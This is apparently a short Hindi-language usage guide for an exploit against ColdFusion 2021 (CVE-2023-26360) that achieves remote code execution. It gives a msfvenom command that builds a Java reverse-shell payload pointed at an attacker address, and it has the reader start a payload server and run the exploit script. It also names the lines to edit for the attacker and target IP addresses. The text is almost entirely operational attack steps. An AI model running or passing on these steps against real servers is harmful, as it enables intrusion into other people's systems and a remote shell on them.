
ColdFusion 2021 (CVE-2023-26360) में रिमोट कोड निष्पादन के लिए शोषण
कभी-कभी, स्क्रिप्ट पहले प्रयास में काम नहीं करतीं। इसे काम करने के लिए कुछ बार प्रयास करें।
msfvenom -p java/shell_reverse_tcp LHOST=192.168.56.1 LPORT=4444 > file.java
server.py प्रारंभ करनाcve.2023-26360.py के साथ प्रारंभिक पहुँच के बाद Coldfusion सर्वर को पेलोड भेजेगा, इसलिए इसे पहले प्रारंभ करना आवश्यक है।python3 server.py 8000
आर्गुमेंट 8000 वह पोर्ट है जिस पर सर्वर सुनेंगा।
यह ध्यान देना महत्वपूर्ण है कि लाइन 12 सर्वर आईपी पता कॉन्फ़िगर करती है, इसलिए इसे बदलें:
s.bind(('192.168.56.1',port))
cve-2023-26360.py चलाएँpython3 cve-2023-26360.py 8000
server.py की तरह, आर्गुमेंट 8000 वह पोर्ट है जिस पर server.py सुनेंगा। इसलिए, यह दोनों कमांड में समान होना चाहिए।
cve-2023-26360.py की लाइन 8 server.py के सुनने के लिए आईपी पता सेट करती है। इसे सही ढंग से कॉन्फ़िगर करना आवश्यक है।
cve-2023-26360.py की लाइन 11 coldfusion सर्वर का आईपी पता सेट करती है, इसलिए इसे बदलें:
url = "http://192.168.56.102:8500"